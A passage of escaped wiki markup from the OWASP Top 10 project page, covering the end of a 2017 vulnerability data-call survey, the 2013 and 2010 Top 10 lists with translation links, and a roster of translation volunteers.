** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: 